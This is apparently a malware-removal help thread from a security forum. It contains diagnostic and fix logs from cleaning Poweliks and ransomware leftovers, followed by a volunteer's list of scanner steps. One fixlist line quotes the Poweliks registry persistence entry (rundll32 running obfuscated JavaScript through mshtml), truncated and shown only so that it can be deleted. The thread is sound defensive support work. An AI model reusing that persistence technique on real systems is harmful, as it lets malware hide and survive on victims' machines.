MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner.exe" /MONITOR
MSCONFIG\startupreg: Nuvshot.exe => C:\Users\scalac\AppData\Local\NEC\UC700\Nuvshost.exe
MSCONFIG\startupreg: UC700.exe => C:\Users\scalac\AppData\Local\NEC\UC700\UC700.exe -SystemStartup

========================= Accounts: ==========================

Administrator (S-1-5-21-1213310510-1649243033-3905780855-500 - Administrator - Enabled) => C:\Users\Administrator
Guest (S-1-5-21-1213310510-1649243033-3905780855-501 - Limited - Disabled)
sradmin (S-1-5-21-1213310510-1649243033-3905780855-1001 - Limited - Enabled)

==================== Faulty Device Manager Devices =============

Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Cisco Systems VPN Adapter
Description: Cisco Systems VPN Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Cisco Systems
Service: CVirtA
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (11/03/2014 11:10:18 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0"1".
Dependent Assembly Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.

Error: (11/03/2014 11:09:17 AM) (Source: SideBySide) (EventID: 9) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
The manifest file root element must be assembly.

Error: (11/03/2014 11:09:16 AM) (Source: SideBySide) (EventID: 9) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
The manifest file root element must be assembly.

Error: (11/03/2014 08:33:10 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/31/2014 05:01:47 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe" -Embedding; Description = Configured Microsoft Office Standard 2010; Error = 0x8007043c).

Error: (10/31/2014 05:01:23 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/31/2014 04:03:10 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/31/2014 02:24:06 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/31/2014 10:36:59 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x541b6f63
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x773ed5ff
Faulting process id: 0x3028
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (10/31/2014 10:36:58 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x541b6f63
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x773ed5ff
Faulting process id: 0x3d0c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3


System errors:
=============
Error: (11/03/2014 11:34:58 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (11/03/2014 11:33:11 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1058) (User: NUVT)
Description: The processing of Group Policy failed. Windows attempted to read the file \\nuvt.com\SysVol\nuvt.com\Policies\{9BB0F799-6A0C-44B0-842C-F242955AF0C8}\gpt.ini from a domain controller and was not successful. Group Policy settings may not be applied until this event is resolved. This issue may be transient and could be caused by one or more of the following:
a) Name Resolution/Network Connectivity to the current domain controller.
B) File Replication Service Latency (a file created on another domain controller has not replicated to the current domain controller).
c) The Distributed File System (DFS) client has been disabled.

Error: (11/03/2014 11:33:11 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1058) (User: NT AUTHORITY)
Description: The processing of Group Policy failed. Windows attempted to read the file \\nuvt.com\SysVol\nuvt.com\Policies\{9BB0F799-6A0C-44B0-842C-F242955AF0C8}\gpt.ini from a domain controller and was not successful. Group Policy settings may not be applied until this event is resolved. This issue may be transient and could be caused by one or more of the following:
a) Name Resolution/Network Connectivity to the current domain controller.
B) File Replication Service Latency (a file created on another domain controller has not replicated to the current domain controller).
c) The Distributed File System (DFS) client has been disabled.

Error: (11/03/2014 10:08:49 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: NT AUTHORITY)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.

Error: (11/03/2014 08:50:39 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: NUVT)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.

Error: (11/03/2014 08:35:04 AM) (Source: TermService) (EventID: 1067) (User: )
Description: The terminal server cannot register 'TERMSRV' Service Principal Name to be used for server authentication. The following error occured: The specified domain either does not exist or could not be contacted.
.

Error: (11/03/2014 08:32:49 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1055) (User: NT AUTHORITY)
Description: The processing of Group Policy failed. Windows could not resolve the computer name. This could be caused by one of more of the following:
a) Name Resolution failure on the current domain controller.
B) Active Directory Replication Latency (an account created on another domain controller has not replicated to the current domain controller).

Error: (11/03/2014 08:32:49 AM) (Source: NETLOGON) (EventID: 5719) (User: )
Description: This computer was not able to set up a secure session with a domain
controller in domain NUVT due to the following:
%%1311

This may lead to authentication problems. Make sure that this
computer is connected to the network. If the problem persists,
please contact your domain administrator.



ADDITIONAL INFO

If this computer is a domain controller for the specified domain, it
sets up the secure session to the primary domain controller emulator in the specified
domain. Otherwise, this computer sets up the secure session to any domain controller
in the specified domain.

Error: (10/31/2014 05:14:40 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Network List Service service depends on the Network Location Awareness service which failed to start because of the following error:
%%1068

Error: (10/31/2014 05:14:35 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Network List Service service depends on the Network Location Awareness service which failed to start because of the following error:
%%1068


Microsoft Office Sessions:
=========================
Error: (11/03/2014 11:10:18 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0"c:\program files\O2Micro\Oz600\DPInst64.exe

Error: (11/03/2014 11:09:17 AM) (Source: SideBySide) (EventID: 9) (User: )
Description: C:\Users\scalac\AppData\Local\NEC\UC700 Outlook Calendar Link\adxloader.dll.ManifestC:\Users\scalac\AppData\Local\NEC\UC700 Outlook Calendar Link\adxloader.dll.Manifest2

Error: (11/03/2014 11:09:16 AM) (Source: SideBySide) (EventID: 9) (User: )
Description: C:\Users\scalac\AppData\Local\NEC\UC700 Office Smart Tag\adxloader.dll.ManifestC:\Users\scalac\AppData\Local\NEC\UC700 Office Smart Tag\adxloader.dll.Manifest2

Error: (11/03/2014 08:33:10 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/31/2014 05:01:47 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe" -EmbeddingConfigured Microsoft Office Standard 20100x8007043c

Error: (10/31/2014 05:01:23 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/31/2014 04:03:10 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/31/2014 02:24:06 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/31/2014 10:36:59 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.17344541b6f63unknown0.0.0.000000000c0000005773ed5ff302801cff52035112981C:\Program Files\Internet Explorer\iexplore.exeunknownbff1eb06-6113-11e4-81a5-d067e5567e93

Error: (10/31/2014 10:36:58 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.17344541b6f63unknown0.0.0.000000000c0000005773ed5ff3d0c01cff520459c5514C:\Program Files\Internet Explorer\iexplore.exeunknownbfbc843e-6113-11e4-81a5-d067e5567e93


==================== Memory info ===========================

Processor: Intel® Core™ i5-2540M CPU @ 2.60GHz
Percentage of memory in use: 63%
Total physical RAM: 3241.05 MB
Available physical RAM: 1197.61 MB
Total Pagefile: 6311.35 MB
Available Pagefile: 4505.48 MB
Total Virtual: 2047.88 MB
Available Virtual: 1890.12 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:232.79 GB) (Free:187 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 232.9 GB) (Disk ID: 90158E44)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=232.8 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#7 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:09:31 PM

Posted 03 November 2014 - 12:38 PM

Hi Georgi

 

Thank you.

 

The only way it would let me post, is if I ended the process trees and quickly copied and pasted



#8 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:05:31 AM

Posted 03 November 2014 - 01:38 PM

Hi,

 

 
Please download the following file => [attachment=157255:fixlist.txt] and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

 

 

Regards,

Georgi


cXfZ4wS.png


#9 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  •  
  • Local time:09:31 PM

Posted 03 November 2014 - 03:43 PM

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 02-11-2014
Ran by ScalaC at 2014-11-03 15:01:49 Run:1
Running from C:\Users\scalac\Desktop
Loaded Profile: ScalaC (Available profiles: Administrator & ScalaC)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
start
CloseProcesses:
HKU\S-1-5-19\...\Winlogon: [Shell] C:\Windows\Explorer.exe [2616320 2011-02-25] (Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-20\...\Winlogon: [Shell] C:\Windows\Explorer.exe [2616320 2011-02-25] (Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-21-19809612-450918713-1538882281-38475\...\Winlogon: [Shell] C:\Windows\Explorer.exe [2616320 2011-02-25] (Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-21-19809612-450918713-1538882281-38475\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-18\...\Winlogon: [Shell] C:\Windows\Explorer.exe [2616320 2011-02-25] (Microsoft Corporation) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-19809612-450918713-1538882281-38475\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-10-31] ()
C:\Windows\System32\drivers\TrueSight.sys
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\Users\scalac\Downloads\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\Users\scalac\Documents\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\Users\scalac\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\Users\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\Users\scalac\Downloads\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\Users\scalac\Documents\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\Users\scalac\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\Users\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\Users\scalac\INSTALL_TOR.URL
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\Users\scalac\Downloads\INSTALL_TOR.URL
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\Users\scalac\Documents\INSTALL_TOR.URL
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\Users\INSTALL_TOR.URL
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\INSTALL_TOR.URL
2014-10-30 20:08 - 2014-10-30 20:08 - 00008510 _____ () C:\Users\scalac\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:08 - 2014-10-30 20:08 - 00008510 _____ () C:\Users\scalac\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:08 - 2014-10-30 20:08 - 00008510 _____ () C:\Users\scalac\AppData\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:08 - 2014-10-30 20:08 - 00004192 _____ () C:\Users\scalac\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:08 - 2014-10-30 20:08 - 00004192 _____ () C:\Users\scalac\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:08 - 2014-10-30 20:08 - 00004192 _____ () C:\Users\scalac\AppData\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:08 - 2014-10-30 20:08 - 00000268 _____ () C:\Users\scalac\AppData\Roaming\INSTALL_TOR.URL
2014-10-30 20:08 - 2014-10-30 20:08 - 00000268 _____ () C:\Users\scalac\AppData\Local\INSTALL_TOR.URL
2014-10-30 20:08 - 2014-10-30 20:08 - 00000268 _____ () C:\Users\scalac\AppData\INSTALL_TOR.URL
2014-10-30 20:07 - 2014-10-30 20:07 - 00008510 _____ () C:\Users\alvayerog\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:07 - 2014-10-30 20:07 - 00008510 _____ () C:\Users\alvayerog\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:07 - 2014-10-30 20:07 - 00008510 _____ () C:\Users\alvayerog\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:07 - 2014-10-30 20:07 - 00008510 _____ () C:\Users\alvayerog\AppData\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:07 - 2014-10-30 20:07 - 00004192 _____ () C:\Users\alvayerog\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:07 - 2014-10-30 20:07 - 00004192 _____ () C:\Users\alvayerog\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:07 - 2014-10-30 20:07 - 00004192 _____ () C:\Users\alvayerog\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:07 - 2014-10-30 20:07 - 00004192 _____ () C:\Users\alvayerog\AppData\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:07 - 2014-10-30 20:07 - 00000268 _____ () C:\Users\alvayerog\INSTALL_TOR.URL
2014-10-30 20:07 - 2014-10-30 20:07 - 00000268 _____ () C:\Users\alvayerog\AppData\Roaming\INSTALL_TOR.URL
2014-10-30 20:07 - 2014-10-30 20:07 - 00000268 _____ () C:\Users\alvayerog\AppData\Local\INSTALL_TOR.URL
2014-10-30 20:07 - 2014-10-30 20:07 - 00000268 _____ () C:\Users\alvayerog\AppData\INSTALL_TOR.URL
2014-10-30 20:06 - 2014-10-30 20:06 - 00008510 _____ () C:\Users\Administrator\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:06 - 2014-10-30 20:06 - 00008510 _____ () C:\Users\Administrator\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:06 - 2014-10-30 20:06 - 00008510 _____ () C:\Users\Administrator\AppData\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:06 - 2014-10-30 20:06 - 00008510 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:06 - 2014-10-30 20:06 - 00004192 _____ () C:\Users\Administrator\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:06 - 2014-10-30 20:06 - 00004192 _____ () C:\Users\Administrator\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:06 - 2014-10-30 20:06 - 00004192 _____ () C:\Users\Administrator\AppData\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:06 - 2014-10-30 20:06 - 00004192 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:06 - 2014-10-30 20:06 - 00000268 _____ () C:\Users\Administrator\INSTALL_TOR.URL
2014-10-30 20:06 - 2014-10-30 20:06 - 00000268 _____ () C:\Users\Administrator\AppData\Local\INSTALL_TOR.URL
2014-10-30 20:06 - 2014-10-30 20:06 - 00000268 _____ () C:\Users\Administrator\AppData\INSTALL_TOR.URL
2014-10-30 20:06 - 2014-10-30 20:06 - 00000268 _____ () C:\ProgramData\INSTALL_TOR.URL
2014-10-30 20:03 - 2014-10-30 20:03 - 00000424 _____ () C:\ProgramData\@system.temp
2014-10-30 20:03 - 2014-10-30 20:03 - 00000160 ____H () C:\ProgramData\@system3.att
2014-10-30 20:03 - 2014-10-30 20:03 - 00000000 ____D () C:\Users\scalac\AppData\Roaming\FrameworkUpdate7
2014-10-29 11:37 - 2014-10-29 16:43 - 00087200 _____ () C:\ProgramData\wrnhoah.tmp
2014-10-24 10:57 - 2014-10-24 10:57 - 00001368 _____ () C:\ProgramData\@system.att
2014-10-24 10:54 - 2014-10-24 10:57 - 00001104 ____H () C:\ProgramData\@system2.att
2014-10-24 10:54 - 2014-10-24 10:54 - 00000448 ____H () C:\Users\scalac\AppData\Roaming\麽鎒駓覜
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\42665744.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\42665744.sys => ""="Driver"
emptytemp:
end
*****************

Processes closed successfully.
HKU\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => value deleted successfully.
HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => value deleted successfully.
HKU\S-1-5-21-19809612-450918713-1538882281-38475\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => value deleted successfully.
"HKU\S-1-5-21-19809612-450918713-1538882281-38475\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key deleted successfully.
"HKU\S-1-5-21-19809612-450918713-1538882281-38475\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
HKU\S-1-5-18\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => value deleted successfully.
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
"HKU\S-1-5-21-19809612-450918713-1538882281-38475\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
TrueSight => Service deleted successfully.
C:\Windows\System32\drivers\TrueSight.sys => Moved successfully.
C:\Users\scalac\Downloads\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\scalac\Documents\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\scalac\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\scalac\Downloads\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\scalac\Documents\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\scalac\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\scalac\INSTALL_TOR.URL => Moved successfully.
C:\Users\scalac\Downloads\INSTALL_TOR.URL => Moved successfully.
C:\Users\scalac\Documents\INSTALL_TOR.URL => Moved successfully.
C:\Users\INSTALL_TOR.URL => Moved successfully.
C:\INSTALL_TOR.URL => Moved successfully.
C:\Users\scalac\AppData\Roaming\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\scalac\AppData\Local\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\scalac\AppData\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\scalac\AppData\Roaming\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\scalac\AppData\Local\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\scalac\AppData\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\scalac\AppData\Roaming\INSTALL_TOR.URL => Moved successfully.
C:\Users\scalac\AppData\Local\INSTALL_TOR.URL => Moved successfully.
C:\Users\scalac\AppData\INSTALL_TOR.URL => Moved successfully.
C:\Users\alvayerog\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\alvayerog\AppData\Roaming\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\alvayerog\AppData\Local\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\alvayerog\AppData\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\alvayerog\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\alvayerog\AppData\Roaming\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\alvayerog\AppData\Local\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\alvayerog\AppData\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\alvayerog\INSTALL_TOR.URL => Moved successfully.
C:\Users\alvayerog\AppData\Roaming\INSTALL_TOR.URL => Moved successfully.
C:\Users\alvayerog\AppData\Local\INSTALL_TOR.URL => Moved successfully.
C:\Users\alvayerog\AppData\INSTALL_TOR.URL => Moved successfully.
C:\Users\Administrator\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Administrator\AppData\Local\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Administrator\AppData\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\ProgramData\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Administrator\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Administrator\AppData\Local\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Administrator\AppData\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\ProgramData\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Administrator\INSTALL_TOR.URL => Moved successfully.
C:\Users\Administrator\AppData\Local\INSTALL_TOR.URL => Moved successfully.
C:\Users\Administrator\AppData\INSTALL_TOR.URL => Moved successfully.
C:\ProgramData\INSTALL_TOR.URL => Moved successfully.
C:\ProgramData\@system.temp => Moved successfully.
C:\ProgramData\@system3.att => Moved successfully.
C:\Users\scalac\AppData\Roaming\FrameworkUpdate7 => Moved successfully.
C:\ProgramData\wrnhoah.tmp => Moved successfully.
C:\ProgramData\@system.att => Moved successfully.
C:\ProgramData\@system2.att => Moved successfully.
C:\Users\scalac\AppData\Roaming\麽鎒駓覜 => Moved successfully.
"HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\42665744.sys" => Key deleted successfully.
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\42665744.sys" => Key deleted successfully.
EmptyTemp: => Removed 2.5 GB temporary data.


The system needed a reboot.

==== End of Fixlog ====



#10 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:05:31 AM

Posted 03 November 2014 - 06:41 PM

Hi,

 

The infection seems to be removed but if you don't mind, I want to make sure there is nothing lurking on the system so just in case I want you to go through these steps:

 

The most of them should take no more than 5 minutes each (but the time they take to complete can vary depending on the size of your hard and the speed of your computer).

 

 

 

STEP 1

 

 

  • Please download RKill by Grinler from the link below and save it to your desktop.

    Rkill
  • Before we begin, you should disable your anti-malware softwares you have installed so they do not interfere RKill running as some anti-malware softwares detect RKill as malicious. Please refer to this page if you are not sure how.
  • Double-click on Rkill on your desktop to run it. (If you are using Windows Vista, please right-click on it and select Run As Administrator)
  • A black screen will appear and then disappear. Please do not worry, that is normal. This means that the tool has been successfully executed.
  • If nothing happens or if the tool does not run, please let me know in your next reply.
  • A log pops up at the end of the run. This log file is located at C:\rkill.log.
  • Please post the log in your next reply.

 

 

STEP 2

 

 

  • Please download RogueKillerX64.exe and save to the desktop.
  • Close all windows and browsers
  • Right-click the program and select 'Run as Administrator'
  • Wait for the prescan to complete and then press the Scan button.
  • When done press the Report button.
  • Please copy and past the results in your next reply.

 

 

STEP 3
 

 

Please download the latest version of TDSSKiller from here and save it to your Desktop.

  • Doubleclick on TDSSKiller.exe to run the application, then click on Change parameters.
     
  • Put a checkmark beside loaded modules.
    Sbf88.png
  • A reboot will be needed to apply the changes. Do it.
  • TDSSKiller will launch automatically after the reboot. Also your computer may seem very slow and unusable. This is normal. Give it enough time to load your background programs.
  • Then click on Change parameters in TDSSKiller.
  • Check all boxes then click OK.
     
  • Click the Start Scan button.
     
  • The scan should take no longer than 2 minutes.
  • If a suspicious object is detected, the default action will be Skip, click on Continue.
     
  • If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.
    Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.

    Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.
  • A report will be created in your root directory, (usually C:\ folder) in the form of "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and past the results at pastebin.com and post the link to the log in your next reply.

 

 

STEP 4

 

 

Please download Malwarebytes Anti-Malware 2.0.3.1025 Final to your desktop.
 

  • Double-click mbam-setup-2.0.3.1025.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.
  • On the Settings tab > Detection and Protection subtab, Detection Options, tick the box 'Scan for rootkits'.
  • Click on the Scan tab, then click on Scan Now >> . If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • With some infections, you may see this message box.
    • 'Could not load DDA driver'
  • Click 'Yes' to this message, to allow the driver to load after a restart.
  • Allow the computer to restart. Continue with the rest of these instructions.
  • When the scan is complete, click Apply Actions.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.

 

 

STEP 5

 

 

1.Please download HitmanPro.

  • For 32-bit Operating System - dEMD6.gif.
